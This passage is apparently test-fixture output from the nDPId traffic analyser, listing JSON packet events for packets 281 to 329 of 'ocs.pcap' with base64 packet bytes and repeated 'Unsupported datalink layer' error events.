-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":281,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANHATQABABm69wKi0AkDppl+6uwG7gNP62xI1A7iAEAE9OTYAAAEBCAoANYdlAMsJ3g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":282,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652798978} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":282,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGHQABABoFWwKi0ArL40DbC2QBQ64tGkd7p1qewEBGvOZcAAAEBCAoANYduRwYInAEBBQre6dwT3unhfw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":283,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799043} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":283,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGIQABABoFVwKi0ArL40DbC2QBQ64tGkd7p1qewEBGvNCUAAAEBCAoANYd0RwYInAEBBQre6dwT3unm6w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":284,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799045} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":284,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGJQABABoFUwKi0ArL40DbC2QBQ64tGkd7p1qewEBGvLrgAAAEBCAoANYd1RwYInAEBBQre6dwT3unsVw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":285,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799110} -00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":285,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMGKQABABoFLwKi0ArL40DbC2QBQ64tGkd7p1qfQEBGvfYoAAAEBCAoANYd7RwYInAEBBRLe6ebr3unsV97p3BPe6exX"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":286,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799112} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":286,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGLQABABoFSwKi0ArL40DbC2QBQ64tGkd7p1qewEBGvKUYAAAEBCAoANYd7RwYInAEBBQre6dwT3unxww=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":287,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799197} 
-00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":287,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMGMQABABoFJwKi0ArL40DbC2QBQ64tGkd7p1qfQEBGvV40AAAEBCAoANYeERwYInAEBBRLe6fcv3un8m97p3BPe6fHD"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":288,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799259} -00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":288,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMGNQABABoFIwKi0ArL40DbC2QBQ64tGkd7p1qfQEBGvUhsAAAEBCAoANYeKRwYInAEBBRLe6fcv3uoCB97p3BPe6fHD"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":289,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799313} -00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":289,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMGOQABABoFHwKi0ArL40DbC2QBQ64tGkd7p1qfQEBGvTKoAAAEBCAoANYePRwYInAEBBRLe6fcv3uoHc97p3BPe6fHD"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":290,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799378} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":290,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGPQABABoFOwKi0ArL40DbC2QBQ64tGkd7p8cOwEBHd3K8AAAEBCAoANYeWRwYJAQEBBQre6fcv3uoHcw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":291,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799447} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":291,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGQQABABoFZwKi0ArL40DbC2QBQ64tGkd7qB3OAEBIKuUkAAAEBCAoANYedRwYJEg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":292,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799448} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":292,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGRQABABoFYwKi0ArL40DbC2QBQ64tGkd7qDN+AEBI3s7AAAAEBCAoANYedRwYJEg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":293,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799507} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":293,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGSQABABoFLwKi0ArL40DbC2QBQ64tGkd7qDN+wEBI3lbsAAAEBCAoANYejRwYJEgEBBQre6hJL3uoXtw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":294,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799509} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":294,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGTQABABoFKwKi0ArL40DbC2QBQ64tGkd7qDN+wEBI3kE8AAAEBCAoANYejRwYJEgEBBQre6hJL3uodIw=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":295,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799564} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":295,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGUQABABoFJwKi0ArL40DbC2QBQ64tGkd7qDN+wEBI3it4AAAEBCAoANYeoRwYJEgEBBQre6hJL3uoijw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":296,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799566} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":296,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGVQABABoFIwKi0ArL40DbC2QBQ64tGkd7qDN+wEBI3hXEAAAEBCAoANYepRwYJEgEBBQre6hJL3uon+w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":297,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799631} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":297,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGWQABABoFTwKi0ArL40DbC2QBQ64tGkd7qJ\/uAEBJkmCcAAAEBCAoANYevRwYJQA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":298,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799689} 
-00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":298,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGXQABABoFGwKi0ArL40DbC2QBQ64tGkd7qJ\/uwEBJkQ\/oAAAEBCAoANYe1RwYJQAEBBQre6i1n3uoy0w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":299,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799739} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":299,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGYQABABoFFwKi0ArL40DbC2QBQ64tGkd7qJ\/uwEBJkPokAAAEBCAoANYe6RwYJQAEBBQre6i1n3uo4Pw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":300,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799771} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":300,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGZQABABoFEwKi0ArL40DbC2QBQ64tGkd7qJ\/uwEBJkORoAAAEBCAoANYe9RwYJQAEBBQre6i1n3uo9qw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":301,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799813} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":301,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGaQABABoFPwKi0ArL40DbC2QBQ64tGkd7qPauAEBKSggMAAAEBCAoANYfBRwYJdA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":302,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799813} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":302,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGbQABABoFOwKi0ArL40DbC2QBQ64tGkd7qQxeAEBK\/fGoAAAEBCAoANYfBRwYJdA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":303,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799853} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":303,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGcQABABoFNwKi0ArL40DbC2QBQ64tGkd7qSIOAEBLsdsMAAAEBCAoANYfFRwYJfg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":304,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799856} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":304,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGdQABABoFMwKi0ArL40DbC2QBQ64tGkd7qTe+AEBMZcSkAAAEBCAoANYfFRwYJfw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":305,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799856} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":305,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGeQABABoFLwKi0ArL40DbC2QBQ64tGkd7qU1uAEBNHa48AAAEBCAoANYfFRwYJfw=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":306,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799880} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":306,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGfQABABoFKwKi0ArL40DbC2QBQ64tGkd7qWMeAEBN0ZeoAAAEBCAoANYfIRwYJiA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":307,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799886} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":307,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGgQABABoFJwKi0ArL40DbC2QBQ64tGkd7qXjOAEBOhYE4AAAEBCAoANYfJRwYJig=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":308,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799887} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":308,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGhQABABoFIwKi0ArL40DbC2QBQ64tGkd7qY5+AEBPOWrUAAAEBCAoANYfJRwYJig=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":309,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799914} 
-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":309,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGiQABABoFHwKi0ArL40DbC2QBQ64tGkd7qaQuAEBP8VRMAAAEBCAoANYfLRwYJkA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":310,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652799917} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":310,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGjQABABoFGwKi0ArL40DbC2QBQ64tGkd7qbneAEBQpT3gAAAEBCAoANYfMRwYJkQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":311,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800246} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":311,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGkQABABoFFwKi0ArL40DbC2QBQ64tGkd7qc+OAEBRWSXkAAAEBCAoANYftRwYJ1g=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":312,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800313} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":312,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGlQABABoE4wKi0ArL40DbC2QBQ64tGkd7qc+OwEBRWUqMAAAEBCAoANYfzRwYJ1gEBBQre6n673uqEJw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink 
layer","datalink":12,"packet_id":313,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800314} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":313,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGmQABABoE3wKi0ArL40DbC2QBQ64tGkd7qc+OwEBRWTTcAAAEBCAoANYfzRwYJ1gEBBQre6n673uqJkw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":314,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800397} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":314,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGnQABABoE2wKi0ArL40DbC2QBQ64tGkd7qc+OwEBRWUpsAAAEBCAoANYf7RwYJ1gEBBQre6nlP3uqJkw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":315,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800400} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":315,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGoQABABoE1wKi0ArL40DbC2QBQ64tGkd7qc+OwEBRWTS4AAAEBCAoANYf8RwYJ1gEBBQre6nlP3uqO\/w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":316,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800470} 
-00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":316,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMGpQABABoEswKi0ArL40DbC2QBQ64tGkd7qc+PQEBRWQP4AAAEBCAoANYgDRwYJ1gEBBRLe6pRr3uqZ197qeU\/e6o7\/"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":317,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800543} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":317,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMGqQABABoErwKi0ArL40DbC2QBQ64tGkd7qc+PQEBRWO4sAAAEBCAoANYgKRwYJ1gEBBRLe6pRr3uqfQ97qeU\/e6o7\/"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":318,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800617} -00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":318,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASMGrQABABoEqwKi0ArL40DbC2QBQ64tGkd7qc+PQEBRWNhcAAAEBCAoANYgSRwYJ1gEBBRLe6pRr3uqkr97qeU\/e6o7\/"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":319,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800636} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":319,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMGsQABABoExwKi0ArL40DbC2QBQ64tGkd7qjv+wEBSDAJ0AAAEBCAoANYgURwYKOgEBBQre6pRr3uqkrw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported 
datalink layer","datalink":12,"packet_id":320,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800718} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":320,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGtQABABoE8wKi0ArL40DbC2QBQ64tGkd7qpK+AEBSxF6cAAAEBCAoANYgcRwYKUg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":321,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800719} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":321,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGuQABABoE7wKi0ArL40DbC2QBQ64tGkd7qqhuAEBTeEg4AAAEBCAoANYgcRwYKUg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":322,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800782} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":322,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGvQABABoE6wKi0ArL40DbC2QBQ64tGkd7qr4eAEBULDF4AAAEBCAoANYgiRwYKYw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":323,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800784} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":323,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGwQABABoE5wKi0ArL40DbC2QBQ64tGkd7qtPOAEBU4BsUAAAEBCAoANYgiRwYKYw=="} 
-00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":324,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800786} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":324,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGxQABABoE4wKi0ArL40DbC2QBQ64tGkd7qul+AEBVmASoAAAEBCAoANYgjRwYKYw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":325,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800836} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":325,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGyQABABoE3wKi0ArL40DbC2QBQ64tGkd7qv8uAEBWT+30AAAEBCAoANYgoRwYKcQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":326,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800837} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":326,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMGzQABABoE2wKi0ArL40DbC2QBQ64tGkd7qxTeAEBXA9eMAAAEBCAoANYgoRwYKcg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":327,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800838} 
-00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":327,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMG0QABABoE1wKi0ArL40DbC2QBQ64tGkd7qyqOAEBXt8EoAAAEBCAoANYgoRwYKcg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":328,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800882} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":328,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMG1QABABoE0wKi0ArL40DbC2QBQ64tGkd7q0A+AEBYb6qAAAAEBCAoANYgsRwYKfg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":329,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652800884} 